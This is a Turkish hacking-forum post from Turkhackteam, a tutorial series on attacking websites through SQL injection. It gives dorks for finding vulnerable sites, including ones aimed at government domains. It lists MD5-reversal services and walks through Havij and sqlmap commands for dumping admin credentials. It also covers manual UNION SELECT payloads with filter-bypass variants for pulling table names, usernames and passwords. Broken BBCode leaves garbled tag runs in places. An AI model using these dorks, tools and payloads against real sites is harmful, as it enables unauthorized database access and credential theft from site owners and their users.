safe3 de açık bulup export diyip açıklar çıktığında ne yapıcaz
Evet Arkadaşlar SQL Açığı ve Türleri Tüm Yöntemler Konuma Hoşgelidiniz !
---------------------------------------------------------------------
DERS 1 SQL Hakkında Kısa Bilgiler
+SQL Nedir ?
+Veri Tabanından Bilgi Çekme Silme Vb. İşlemler İçin Kullanılır
+İnternet Sitelerinde Çokca Bulunan Bir Açıktır.
+KRİTİK BİR AÇIKITR !
+SQL Açığı Nedir ?
-SQL Açığı Veritabanındaki Zafiyetlerden Oluşur.
+SQL Açıklı Siteleri Nasıl Bulurum ?
+Gerekli Dorkarı Yazarak
ÖRNEK :Kod:inurl:newsDetail.php?id= inurl:gallery.php?id= i nurl:article.php?id=
+SQL 'De Hedef Ülke İçin Dork Nasıl Yazılır ?
-Kod:inurl:php?id= gov.fr
+SQL Dork Yazdım Siteyi Buldum Açık Olduğunu Nasıl Anlarım ?
ÖRN:www.örneksitemiz.com/newsDetail.php?id=12
>>
id=12'
>>
id=12'nin Yanına tek tırnak (') Koyuyoruz.
Kod:[COLOR=Orange][B][SIZE=2][COLOR=White][COLOR=Yellow][COLOR=SeaGreen][COLOR=SandyBrown][COLOR=SeaGreen][COLOR=DarkRed][COLOR=Teal][COLOR=DarkOrange][COLOR=SandyBrown][COLOR=Orange][COLOR=SandyBrown]i[COLOR=Gray]nclude(../inc/content220\\\\\\\\\\\\\\\\.inc.php) [function.include]: failed to open stream: No such file or directory in /homepages/6/d27097856/htdocs/www.fanatec.de/html/index.php on line 162[/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/SIZE][/B][/COLOR]
---------------------------------------------------------------------
DERS 2 MD5 ÇÖZME
Arkadaşlar MD5 Kırma Diye Birşey Günümüzde Bulunmamaktadır.
MD5'i Çözülenler Google Databasesinde Mevcuttur.
Bazı Siteler Çözülmüş MD5LERİ Bulmamızda Yardımcı Oluyor.
ÖRN :---------------------------------------------------------------------Kod:[LIST=1] [*][URL="http://tr.freemd5.com/"]http://tr.freemd5.com[/URL] [*][URL="http://md5.rednoize.com/"]â Hash Toolkit - Reverse MD5 / SHA1 Hashes â [/URL] [*][url=http://www.md5decrypter.co.uk/]HashKiller.co.uk, Over 131.235 billion decrypted hashes in total, Free Hash Cracker, Online Hash Cracker[/url] [*][URL="http://md5cracker.org/"]md5cracker.org | The Cracking Engine for MD5-Hashes[/URL] [*][URL="http://www.md5crack.com/"]MD5 Crack | A free online MD5 hash and password cracker and decrypter.[/URL] [*][URL="http://www.md5this.com/"]md5 cracker - The fastest way to recover your lost passwords - Crack it[/URL] [*][URL="http://www.cmd5.org/"]online md5 cracker,md5 decoder, md5 decrypt[/URL] [*][URL="http://www.tobtu.com/md5.php"]MD5 Cracker - TobTu[/URL] [*][URL="http://cracker.fox21.at/"]Cracker[/URL] [*][URL]http://www.hash-cracker.com/[/URL] [*][URL="http://www.md5decrypter.com/"]MD5 Decrypter.com, MD5 Decryption, Free MD5 Decrypter, Security, MD5 Hash, MD5 Security.[/URL] [*][URL="http://www.xmd5.org/"]md5,md5???,XMD5[/URL] [*][URL="http://www.hash-database.net/"]hash-database.net[/URL] [*][URL="http://www.md5-hash.com/"]md5-hash.com[/URL] [/LIST]
Ders 3 Admin Panel Bulma
1-)İntelli Tamper :
Sitenin Dosyalarını Çekip Admin Panelini Bulabilirsiniz.
2-)Havij:
Haviji İndirip Menülerden " Admin Panel Finder " Basıp Admin Panelini Bulabilirsiniz .
3-)Robots.txt ; ve Sitemap ;
Sitemap= Bulundugunuz Sitenin Haritasını Gösterir Ki Admin Panelini Bulabilirsiniz
Robots.txt= İse Eger Ki Adminin Browser'ı Google İse Robots.txt Site'deki Bi Nevi Kayıt Yapan GoogleRobotudur(Script Kaydı ) Bunuda txt Belgesi Olarak sİtede Görüntüleyebilirsiniz.
+Robots.txt ve sitemap ; nasıl uygularım ?
-www.siteadresi.com/sitemap.xml&&
yada
-www.siteadresi.com/robots.tx
---------------------------------------------------------------------
DERS 4 HEDEF SİTEDE SQL AÇIK TARAYICI PROGRAMLAR
1-)Safe 3 :
www.hedefsitemiz.com/ Şeklinde Yazıp " Scan" Butonuna Basıyoruz .
-Eğer Açık Var İse "Vulnerablinies" Bölümünde çıkacaktır.
-Açık Çıktıysa Sağ Tıklayıp " Export " Diyoruz .
- Ve Bizi Açığa Yönlendiriyor.
2-)Acunetix :
Sol Üst Köşede " New Scan " Basıyoruz.
-Karşımıza Çıkan Pencere'de Hedef Sitemizin Başına "http://www." Koyarak Yazıyoruz .
-Next ... Next Diyoruz
-VE Finish Geliyor Finish Deyip Açık Taramasını Bekliyoruz.
-Kritik Açık Olduğunu Kırmızı Renkteki Açıklar Belitiyor. İşimize Yarayan O'dur.
3-)WebCruiserWWS :
-Web Cruiser Programı xss , lfi , sql , rfi açıkları tarayabilir.
-scanner deyip hedef sitemizi yazıp " scan site " dediktan sonra tarama başlar.
---------------------------------------------------------------------
Ders 5 Havij İle Site Hackleme
+HAVİJ AÇIYORUZ TARGET YAZAN YERE SİTE ADRESİMİZİ YAZIYORUZ.
+Sitemizi Yazdıktan Sonra " Analyze " Tuşuna Basıyoruz.
+Bekliyoruz...
+Tables Diyoruz ve Databasemizi Seçiyoruz.
+Databesemizi Seçtikten Sonra " Tables >> Get Tables " Diyoruz.
+Bilgilerimiz Geliyor...
+Gelen Bilgilerden " USER " Seçiyoruz.
+User Seçtikten Sonra >> " get columns " diyoruz.
+Yeni Bilgiler Geliyor Bize Lazım Olan " ADMİN(username) VE PASSWORD " SEÇİYORUZ.
+ADMİN(USERNAME) VE PASSWORD SEÇTİKTEN SONRA >> " GET DATA " DİYORUZ.
+Ve İstediğimiz Bilgiler Çekiliyor ..
---------------------------------------------------------------------
DERS 6 SQLMAP İLE SİTE HACK
Gerekli Programlar :
+SQLMAP
+Phyton 2.7
Yükledikten Sonra :
+SQLMAP'I C:// Dizisine Atın.
+İlk Olarak CMD açın ve ;
+Devam Ediyoruz.Kod:cd..
+Bir Değişiklik Yapıyoruz.Kod:cd..
+SQLMAP yoluna geldik şimdiKod:cd sqlmap
+Şimdi Bize [Y/n] Sorusu Soracak Y Deyip Devam EdiyoruzKod:sqlmap.py -u''http://site.com/php?id=1'' --dbs
+Tabloları Çekelim
Kod:sqlmap.py -u''http://site.com/php?id=1'' veritabanı ismi --tables
+Düzenlersek
Kod:sqlmap.py -u''http://site.com/php?id=1'' türkhack--tables
Kod:sqlmap.py -u''http://site.com/php?id=1'' türkhack -T tablo_ismi --columns
+Düzenlersek
Kod:sqlmap.py -u''http://site.com/php?id=1'' türkhack -T admin --columns
ADMİN Kolonları İçindeki Tabloları Bulduk Varsayarsak
+----------+--------------+
| Column | Type |
+----------+--------------+
| Password | varchar(100) |
| Username | varchar(100) |
Bunlar geldi varsayalım..
+Şifre Bulmak İçin.
Kod:sqlmap.py -u''http://site.com/php?id=1'' türkhack-T admin -C Password --dump
+Kullanıcı Adı İçin.
Kod:sqlmap.py -u''http://site.com/php?id=1'' türkhack-T admin -C Username --dump
---------------------------------------------------------------------
Ders 7 Manuel SQL Hack
Saldırı Aşamaları :
İki Türlü Saldırı Yapılabilir Havij ve Manuel .
İlk Olarak Manuel İle Saldıralım.
1-)İlk Önce Sitenin Kolon Sayısını Öğreneceğiz .
2-)Kolonları Yansıtacağız.
3-)Tablo İsimlerini Çekeceğiz.
4-)Tablolardan İstediğmizi Alacağız ( Şifre - Email - Kullanıcı Adı)
Ve Saldırıyoruz ...
1-)Kolon Sayısını Öğrenme :
Site:örneksitemiz.com/index.php?id=30
Arkadaşlar Sitemizin Sonuna (order+by+sayı- ) ( - işaretini getirmeyi unutmayalım)
Kod:>> örneksitemiz.com/index.php?id=30+order+by+29-
Eğer Şöyle Bir Hata Gelirse :
Hata: Unknown column 10 in order clause Benzer Bir Hata Çıkarsa ;
>> Kolon Sayısı 29'dan Küçük Tek Tek Aşağı İniyoruz .
>>order+by+28- , order+by+27-, order+by+26 , Site Eski Haline Gelesiye Kadar İniyoruz .
>> order+by+25- ( Sayfa Burda Eski Haline Gelmiş İse KOLON SAYIMIZ 25'Dir . )
2-)Kolonları Yansıtma
Arkadaşlar Burda +union+select+kolon Teker Teker Yazıyoruz. (- Sitenin Sonuna Yine Eklenecektir.)
>>
Kod:[URL="http://www.%C3%B6rneksitemiz.com/index.php?id=30"]www.örneksitemiz.com/index.php?id=30[/URL] URL Sonuna
>>
Kod:www.örneksitemiz.com/index.php?id=30+union+select+1+2+3+4+5+...23+24+25-
Şeklinde Olucak Kolon Sayımız Kaçsa Oraya Kadar Yazacağız.
>>
Şimdi Ekranı Sayılar Yansıyacak 10 ve 13 Yansıdı Diyelim. Bu Sayılardan Birini Seçip İşlemimize Devam Edeceğiz.Eğer Sayılar Yansımazsa Bypass Gerekecek.
>>Bypass
Kod:1) Normal: +union +select+1,2,3,4,5,6,7,25 Bypass: +/*!union*/+/*!select*/+1,2,3,4,5,6,7,25 2) Normal:+union +select+1,2,3,4,5,6,7,25 Bypass: +union +(select+1,2,3,4,5,6,7,25) 3) Normal:+union +select+1,2,3,4,5,6,7,25 Bypass: +#union# +#select#+1,2,3,4,5,6,7,25
3-)Tablo İsimlerini Çekmek
-Yansıyan Sayıları ( 10 ve 13) Birini Seçiyoruz .
-10 Seçelim.
Kod:A-)www.örneksitemiz.com/index.php?id=30+union+select+1,2,database(),3,4,5, 6,7,8,..,24,25-
Bu Komut Sayesinde Sitenin VeriTabanı İsmini Öğreniyoruz.
Kod:B-)www.örneksitemiz.com/index.php?id=30+union+select+1,2,version(),3,4,5,6 ,7,8,..,24,25-
Bu Komut Sayesinde Sitenin VeriTabanı Versiyonunu Öğreniyoruz.
[/B][/COLOR][/SIZE][/COLOR][/SIZE][/COLOR][/SIZE][/COLOR][/COLOR][/SIZE][/B][/COLOR]Kod:C-)www.örneksitemiz.com/index.php?id=30+union+select+1,2,group_contact(tab le_name),4,5,6,7,8,...,24,25+from+information_schema.tables- [COLOR=Orange][B][SIZE=2][COLOR=White][COLOR=Yellow][SIZE=3][COLOR=white][SIZE=3][COLOR=white] [SIZE=2][COLOR=SandyBrown][B] information_schema.tables = veritabanındaki tablo isimlerini gösterir >>schema.tables yerini daha sonra şu komutu yazıyoruz. [/B][B] information_schema.columns = veritabanındaki kolon isimlerini gösterir [CODE]-)[URL="http://www.%C3%B6rneksitemiz/index.php?id=30+union+select"]www.örneksitemiz/index.php?id=30+union+select[/URL]+1,2,group_concat(table_name),4,5,...,24,25+from+i nformation_schema.tables+where+tables_schema=database()
Bu kod sayesinde sadece hedef sitenin tablo isimlerini öğreniriz. Şimdi bu kodu gönderelim, gönderdikten sonra sitenin tablo isimleri ekrana yansıyacaktır. Örneğin yansıyan isimleri aşağıya yazalım.
Tablo İsimleri: admin,yerler,etkinlikler,yaptıklarımız
Bizim burada ilgileneceğimiz tablo ismi admin dir.
4-)Tablo İsimlerinden Veriyi Almak
-Adminin Verilerini Alacağız.
Kod:www.örneksitemiz.com/index.php?id=30+union+select+1,2,group_concat(CoLumn_Name),4,5,6,7,8+fr om+information_schema.CoLumns+where+TabLeS_schema= database()+and+TabLe_Name=admin
Bu Kodu Gönderdikten Sonra Admin İçindeki Sütunlar Gelecektir. Gelen Sutünlar
ÖRN : user
passaword
phone number
Bize Lazım Olanlar " User ve Passaword "
>>
Şimdi Bize Lazım Olan Passaword ve User Sütunlarını Alalım
>>
Kod:www.örneksite.com/index.php?id=30+union+select+1,2,group_concat(user,password),4,5,6,7,8+ from+admin
Kodunu Yazıp Sayfayı Yeniliyoruz.
>>
Ve Ekrana User ve Passaword Bilgileri Yansıyacaktır.
>>
Bilgileri Aldık Şimdi ( Admin Panelini ) Bulmamız Gerekecektir. (İntelli Tamper Programı Bu konuda İyidir)
Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.